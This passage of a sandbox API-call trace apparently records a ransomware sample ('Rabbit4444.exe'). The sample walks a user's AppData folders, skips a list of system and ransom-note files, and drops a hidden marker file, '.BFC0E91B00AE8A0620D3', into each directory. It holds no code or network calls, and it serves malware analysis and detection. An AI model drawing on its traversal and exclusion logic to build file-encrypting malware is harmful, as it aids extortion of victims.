lpString1=0x130ebd0, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0060.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0060.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x123f70 [0060.849] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x1220c8 [0060.849] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788510a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x788510a7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x788510a7, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0060.849] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0060.849] lstrcpyW (in: lpString1=0x130ebd0, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0060.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0060.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x123820 [0060.849] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122328 [0060.849] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd28ef8f4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x99201695, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0060.849] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.849] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.849] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0060.849] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0060.849] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0060.850] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0060.850] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0060.850] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0060.850] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0060.850] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0060.850] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0060.850] lstrcpyW (in: lpString1=0x130ebd0, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0060.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0060.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x124308 [0060.850] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x1222c8 [0060.850] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd28ef8f4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x99201695, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0060.850] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0060.853] lstrcpyW (in: lpString1=0x130ebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.853] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.854] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.854] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.854] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.854] CloseHandle (hObject=0x2a0) returned 1 [0060.854] CloseHandle (hObject=0x27c) returned 1 [0060.854] GetCurrentThreadId () returned 0xd98 [0060.854] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0060.854] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState" [0060.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124308 | out: hHeap=0xe0000) returned 1 [0060.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0060.854] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState" [0060.854] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\" [0060.854] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0060.855] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.858] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.861] FlushFileBuffers (hFile=0x27c) returned 1 [0060.862] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.862] CloseHandle (hObject=0x27c) returned 1 [0060.863] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState") returned 85 [0060.863] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.863] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd28ef8f4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed982dc2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0060.863] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.863] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.863] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.863] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.863] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd28ef8f4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed982dc2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.863] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.863] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.863] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.863] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.863] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.863] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed982dc2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed982dc2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.863] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.864] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.864] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed982dc2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed982dc2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.864] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0060.864] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.864] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.864] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.864] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.865] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.865] CloseHandle (hObject=0x2a0) returned 1 [0060.865] CloseHandle (hObject=0x27c) returned 1 [0060.865] GetCurrentThreadId () returned 0xd98 [0060.865] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0060.865] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData" [0060.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0060.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0060.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData" [0060.865] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\" [0060.865] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0060.865] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.867] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.869] FlushFileBuffers (hFile=0x27c) returned 1 [0060.870] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.870] CloseHandle (hObject=0x27c) returned 1 [0060.871] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData") returned 89 [0060.871] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.871] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788510a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x788510a7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0060.871] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.871] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.871] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.871] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.871] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788510a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x788510a7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.871] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.871] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.871] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.871] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.871] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.871] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9a905e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9a905e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.871] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.871] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.871] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9a905e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9a905e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.871] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0060.871] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.871] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.872] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.872] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.872] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.872] CloseHandle (hObject=0x2a0) returned 1 [0060.872] CloseHandle (hObject=0x27c) returned 1 [0060.872] GetCurrentThreadId () returned 0xd98 [0060.872] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0060.873] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings" [0060.873] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123f70 | out: hHeap=0xe0000) returned 1 [0060.873] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0060.873] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings" [0060.873] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\" [0060.873] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0060.873] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.875] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.881] FlushFileBuffers (hFile=0x27c) returned 1 [0060.882] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.882] CloseHandle (hObject=0x27c) returned 1 [0060.882] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings") returned 84 [0060.882] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.882] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0060.882] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.882] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.882] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.882] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.882] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xed9a905e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.883] lstrcmpiW (lpString1="..", 